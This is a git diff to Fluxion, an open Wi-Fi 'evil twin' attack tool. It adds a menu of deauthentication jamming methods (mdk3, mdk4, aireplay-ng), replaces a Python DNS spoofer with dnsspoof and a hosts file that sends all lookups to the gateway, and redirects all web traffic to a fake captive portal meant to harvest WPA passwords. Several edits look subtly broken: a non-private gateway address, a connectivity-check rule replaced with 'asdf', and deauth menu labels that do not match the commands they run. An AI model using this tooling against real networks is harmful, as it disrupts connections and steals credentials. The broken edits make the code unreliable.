Merge pull request #813 from FluxionNetwork/usama7628674-fixes
Usama7628674 fixes
This commit is contained in:
commit
3535f5ed6a
|
@ -16,7 +16,7 @@ CaptivePortalAuthenticationMethodsInfo=(
|
|||
# ============= < Virtual Network Configuration > ============ #
|
||||
# To avoid collapsing with an already existing network,
|
||||
# we'll use a somewhat uncommon network and server IP.
|
||||
CaptivePortalGatewayAddress="192.168.254.1"
|
||||
CaptivePortalGatewayAddress="192.169.254.1"
|
||||
CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*}
|
||||
|
||||
|
||||
|
@ -116,7 +116,7 @@ captive_portal_set_ap_interface() {
|
|||
# interface is in used by something else (virtual reservation?).
|
||||
echo "Virtual interface required, attempting." > $FLUXIONOutputDevice
|
||||
if ! iw dev $CaptivePortalJammerInterface interface \
|
||||
add ${CaptivePortalJammerInterface}v type monitor \
|
||||
add ${CaptivePortalJammerInterface}v type managed \
|
||||
2> $FLUXIONOutputDevice; then
|
||||
echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError"
|
||||
sleep 5
|
||||
|
@ -154,6 +154,13 @@ function captive_portal_set_ap_service() {
|
|||
|
||||
captive_portal_unset_ap_service
|
||||
|
||||
echo -e "$FLUXIONVLine ${CClr}Select a method of deauthentication\n${CClr}"
|
||||
echo -e "${CSRed}[${CSYel}1${CSRed}]${CClr} mdk4${CClr}"
|
||||
echo -e "${CSRed}[${CSYel}2${CSRed}]${CClr} aireplay${CClr}"
|
||||
echo -e "${CSRed}[${CSYel}3${CSRed}]${CClr} mdk3\n${CClr}"
|
||||
read -p $'\e[0;31m[\e[1;34mfluxion\e[1;33m@\e[1;37m'"$HOSTNAME"$'\e[0;31m]\e[0;31m-\e[0;31m[\e[1;33m~\e[0;31m] \e[0m' option_deauth
|
||||
|
||||
|
||||
if [ "$FLUXIONAuto" ]; then
|
||||
CaptivePortalAPService="hostapd"
|
||||
else
|
||||
|
@ -725,7 +732,7 @@ index-file.names = (
|
|||
|
||||
# Respond with Google's captive response on certain domains.
|
||||
# Domains: www.google.com, clients[0-9].google.com, connectivitycheck.gstatic.com, connectivitycheck.android.com, android.clients.google.com, alt[0-9]-mtalk.google.com, mtalk.google.com
|
||||
\$HTTP[\"host\"] =~ \"((www|(android\.)?clients[0-9]*|(alt[0-9]*-)?mtalk)\.google|connectivitycheck\.(android|gstatic))\.com\" {
|
||||
\$HTTP[\"host\"] =~ \"asdf\" {
|
||||
server.document-root = \"$FLUXIONWorkspacePath/captive_portal/connectivity_responses/Google/\"
|
||||
url.rewrite-once = ( \"^/generate_204\$\" => \"generate_204.php\" )
|
||||
}
|
||||
|
@ -734,7 +741,7 @@ index-file.names = (
|
|||
echo "\
|
||||
# Redirect all traffic to the captive portal when not emulating a connection.
|
||||
\$HTTP[\"host\"] != \"captive.gateway.lan\" {
|
||||
url.redirect-code = 302
|
||||
url.redirect-code = 307
|
||||
url.redirect = (
|
||||
\"^/(.*)\" => \"http://captive.gateway.lan/\",
|
||||
)
|
||||
|
@ -742,92 +749,15 @@ index-file.names = (
|
|||
" >>"$FLUXIONWorkspacePath/lighttpd.conf"
|
||||
fi
|
||||
|
||||
# Create a DNS service with python, forwarding all traffic to gateway.
|
||||
# Create a temporary hosts file to be used with dnsspoof
|
||||
echo "\
|
||||
import sys, traceback, socket
|
||||
# NOTICE: This DNS server works with python 2 and python 3
|
||||
${CaptivePortalGatewayAddress} *.*
|
||||
172.217.5.238 google.com
|
||||
172.217.13.78 clients3.google.com
|
||||
172.217.13.78 clients4.google.com
|
||||
" >"$FLUXIONWorkspacePath/hosts"
|
||||
|
||||
class DNSQuery:
|
||||
def __init__(self, data):
|
||||
self.data = data
|
||||
self.domain = ''
|
||||
|
||||
queryType = (ord(data[2]) >> 3) & 15
|
||||
|
||||
# Only handle basic requests.
|
||||
if queryType != 0:
|
||||
print('Ignoring Query: Non-spoofed type.')
|
||||
return
|
||||
|
||||
domainStart = 13 # Skip length byte and start at domain.
|
||||
domainLength = ord(data[domainStart - 1]) # Evaluate length byte.
|
||||
|
||||
while domainLength != 0:
|
||||
self.domain += data[domainStart : domainStart + domainLength] + '.'
|
||||
|
||||
domainStart += domainLength + 1 # Skip the length byte & start at domain.
|
||||
domainLength = ord(data[domainStart - 1]) # Evaluate length byte.
|
||||
|
||||
def response(self, ipv4):
|
||||
if not self.domain: return ''
|
||||
|
||||
packet = ''
|
||||
|
||||
packet += self.data[ :2] + '\x81\x80'
|
||||
packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
|
||||
packet += self.data[12:]
|
||||
packet += '\xc0\x0c'
|
||||
packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
|
||||
|
||||
# Convert string IPv4 quads to binary values (bytes).
|
||||
packet += str.join('', map(lambda s: chr(int(s)), ipv4.split('.')))
|
||||
|
||||
return packet
|
||||
|
||||
if __name__ == '__main__':
|
||||
targetIPv4 = '$CaptivePortalGatewayAddress'
|
||||
|
||||
print('Mini DNS Spoofer:: dom.query. 60 IN A %s' % targetIPv4)
|
||||
|
||||
link = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
link.bind(('',53))
|
||||
|
||||
try:
|
||||
while True:
|
||||
clientData, clientIPv4 = link.recvfrom(1024)
|
||||
|
||||
queryData = clientData if sys.version_info < (3, 0) else clientData.decode('unicode_escape')
|
||||
|
||||
query = DNSQuery(queryData)
|
||||
|
||||
response = query.response(targetIPv4)
|
||||
|
||||
if sys.version_info > (3, 0):
|
||||
# Someone that knows more about python and how it does byte-handling,
|
||||
# please fix the following shitfest and make it a bit more elegant.
|
||||
# Do what? A raw conversion of the \"response\" string to bytes.
|
||||
responseHex = ''
|
||||
for xx in response:
|
||||
responseHex += \"%x%x\" % ((ord(xx) >> 4) & 0b1111, ord(xx) & 0b1111)
|
||||
|
||||
response = bytearray.fromhex(responseHex)
|
||||
|
||||
link.sendto(response, clientIPv4)
|
||||
|
||||
print('Request: %s -> %s' % (query.domain, targetIPv4))
|
||||
|
||||
except KeyboardInterrupt:
|
||||
print('INTERRUPT: Stopping.')
|
||||
link.close()
|
||||
|
||||
except Exception as error:
|
||||
print('EXCEPTION: Stopping!')
|
||||
print(error)
|
||||
print(traceback.format_exc())
|
||||
link.close()
|
||||
" >"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
|
||||
|
||||
chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
|
||||
#chmod +x "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
|
||||
|
||||
local -r targetSSIDCleanNormalized=${FluxionTargetSSIDClean//"/\\"}
|
||||
# Attack arbiter script
|
||||
|
@ -1429,7 +1359,7 @@ stop_attack() {
|
|||
CaptivePortalWebServicePID="" # Clear service PID
|
||||
fi
|
||||
|
||||
# Kill python DNS service if one is found.
|
||||
# Kill DNS service if one is found.
|
||||
if [ "$CaptivePortalDNSServiceXtermPID" ]; then
|
||||
kill $(pgrep -P $CaptivePortalDNSServiceXtermPID \
|
||||
2> $FLUXIONOutputDevice) &> $FLUXIONOutputDevice
|
||||
|
@ -1496,7 +1426,7 @@ start_attack() {
|
|||
echo -e "$FLUXIONVLine $CaptivePortalStartingDNSServiceNotice"
|
||||
xterm $FLUXIONHoldXterm $BOTTOMLEFT -bg black -fg "#99CCFF" \
|
||||
-title "FLUXION AP DNS Service" -e \
|
||||
"if type python2 >/dev/null 2>/dev/null; then python2 \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; else python \"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py\"; fi" &
|
||||
"dnsspoof -i ${CaptivePortalAccessInterface} -f \"$FLUXIONWorkspacePath/hosts\"" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalDNSServiceXtermPID=$!
|
||||
|
||||
|
@ -1519,14 +1449,28 @@ start_attack() {
|
|||
"./$FLUXIONWorkspacePath/captive_portal/deauth-ng.py -i $CaptivePortalJammerInterface -f 5 -c $FluxionTargetChannel -a $FluxionTargetMAC" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalJammerServiceXtermPID=$!
|
||||
else
|
||||
elif [[ $option_deauth -eq 1 ]]; then
|
||||
|
||||
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \
|
||||
-title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \
|
||||
"mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk3_blacklist.lst\"" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalJammerServiceXtermPID=$!
|
||||
elif [[ $option_deauth -eq 2 ]]; then
|
||||
|
||||
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \
|
||||
-title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \
|
||||
"aireplay-ng -0 0 -a $FluxionTargetMAC --ignore-negative-one $CaptivePortalJammerInterface" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalJammerServiceXtermPID=$!
|
||||
|
||||
elif [[ $option_deauth -eq 3 ]]; then
|
||||
|
||||
xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg black -fg "#FF0009" \
|
||||
-title "FLUXION AP Jammer Service [$FluxionTargetSSID]" -e \
|
||||
"mdk3 $CaptivePortalJammerInterface d -c $FluxionTargetChannel -b \"$FLUXIONWorkspacePath/mdk4_blacklist.lst\"" &
|
||||
# Save parent's pid, to get to child later.
|
||||
CaptivePortalJammerServiceXtermPID=$!
|
||||
fi
|
||||
|
||||
echo -e "$FLUXIONVLine $CaptivePortalStartingAuthenticatorServiceNotice"
|
||||
|
|
|
@ -11,7 +11,7 @@ CaptivePortalStaringAPRoutesNotice="Starte den routing Service "
|
|||
CaptivePortalStartingDHCPServiceNotice="Starte den DHCP Service"
|
||||
CaptivePortalStartingDNSServiceNotice="Starte den DNS Service."
|
||||
CaptivePortalStartingWebServiceNotice="Starte den AP"
|
||||
CaptivePortalStartingJammerServiceNotice="Starte mdk3 als Service"
|
||||
CaptivePortalStartingJammerServiceNotice="Starte mdk4/aireplay als Service"
|
||||
CaptivePortalStartingAuthenticatorServiceNotice="Authentifizierungsskript wird gestartet"
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
CaptivePortalAPServiceQuery="Select an access point service"
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
# description: Acquires WPA/WPA2 encryption hashes.
|
||||
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
HandshakeSnooperJammerInterfaceQuery="Selecteer eenn interface voor monitoring & jamming."
|
||||
HandshakeSnooperJammerInterfaceQuery="Selecteer een interface voor monitoring & jamming."
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
HandshakeSnooperMethodQuery="Selecteer een methode voor handshake verkrijgen"
|
||||
HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passief$CClr)"
|
||||
|
@ -23,8 +23,8 @@ HandshakeSnooperStartingArbiterNotice="${CCyn}Handshake Snooper$CClr arbiter dae
|
|||
HandshakeSnooperSnoopingForNSecondsNotice="Snooping voor \$HandshakeSnooperVerifierInterval seconden."
|
||||
HandshakeSnooperStoppingForVerifierNotice="Stop snooper & controle voor hashes."
|
||||
HandshakeSnooperSearchingForHashesNotice="Zoek naar hashes in het capture bestand."
|
||||
HandshakeSnooperArbiterAbortedWarning="${CYel}Geannuleerd${CClr}: De operatie is geannuleerd been, geen geldige hash gevonden."
|
||||
HandshakeSnooperArbiterSuccededNotice="${CGrn}Gelukt${CClr}: Een geldige hash is gedetecteerd en opgeslagen in de fluxion's database."
|
||||
HandshakeSnooperArbiterAbortedWarning="${CYel}Afgebroken${CClr}: De operatie is afgebroken, geen geldige hash gevonden."
|
||||
HandshakeSnooperArbiterSuccededNotice="${CGrn}Gelukt${CClr}: Een geldige hash is gedetecteerd en opgeslagen in de fluxion database."
|
||||
HandshakeSnooperArbiterCompletedTip="${CBCyn}Handshake Snooper$CBYel aanval afgerond, Sluit dit scherm en start een andere aanval.$CClr"
|
||||
# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
||||
|
||||
|
|
11
fluxion.sh
11
fluxion.sh
|
@ -4,6 +4,10 @@
|
|||
# ================== < FLUXION Parameters > ================== #
|
||||
# ============================================================ #
|
||||
# Path to directory containing the FLUXION executable script.
|
||||
|
||||
for program in "$(airmon-ng check | awk 'NR>6{print $2}')"; do
|
||||
killall $program &> /dev/null
|
||||
done
|
||||
readonly FLUXIONPath=$(dirname $(readlink -f "$0"))
|
||||
|
||||
# Path to directory containing the FLUXION library (scripts).
|
||||
|
@ -21,8 +25,8 @@ readonly FLUXIONPreferencesFile="$FLUXIONPath/preferences/preferences.conf"
|
|||
readonly FLUXIONNoiseFloor=-90
|
||||
readonly FLUXIONNoiseCeiling=-60
|
||||
|
||||
readonly FLUXIONVersion=5
|
||||
readonly FLUXIONRevision=9
|
||||
readonly FLUXIONVersion=6
|
||||
readonly FLUXIONRevision=0
|
||||
|
||||
# Declare window ration bigger = smaller windows
|
||||
FLUXIONWindowRatio=4
|
||||
|
@ -280,7 +284,7 @@ fluxion_startup() {
|
|||
local requiredCLITools=(
|
||||
"aircrack-ng" "bc" "awk:awk|gawk|mawk"
|
||||
"curl" "cowpatty" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd"
|
||||
"iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl"
|
||||
"iwconfig:wireless-tools" "macchanger" "mdk4" "dsniff" "mdk3" "nmap" "openssl"
|
||||
"php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools"
|
||||
"fuser:psmisc" "killall:psmisc"
|
||||
)
|
||||
|
@ -352,6 +356,7 @@ fluxion_shutdown() {
|
|||
# Only deallocate fluxion or airmon-ng created interfaces.
|
||||
if [[ "$interface" == "flux"* || "$interface" == *"mon"* || "$interface" == "prism"* ]]; then
|
||||
fluxion_deallocate_interface $interface
|
||||
systemctl restart network-manager
|
||||
fi
|
||||
done
|
||||
fi
|
||||
|
|
|
@ -72,7 +72,7 @@ function ap_service_start() {
|
|||
|
||||
xterm $FLUXIONHoldXterm $TOP -bg "#000000" -fg "#FFFFFF" \
|
||||
-title "FLUXION AP Service [airbase-ng]" -e \
|
||||
airbase-ng -P -e $APServiceSSID -c $APServiceChannel \
|
||||
airbase-ng -y -e $APServiceSSID -c $APServiceChannel \
|
||||
-a $APServiceMAC $APServiceInterface &
|
||||
local parentPID=$!
|
||||
|
||||
|
@ -81,7 +81,7 @@ function ap_service_start() {
|
|||
sleep 1
|
||||
APServicePID=$(pgrep -P $parentPID)
|
||||
done
|
||||
|
||||
eval ifconfig at0 192.169.254.1
|
||||
ap_service_route
|
||||
}
|
||||
|
||||
|
|
Loading…
Reference in New Issue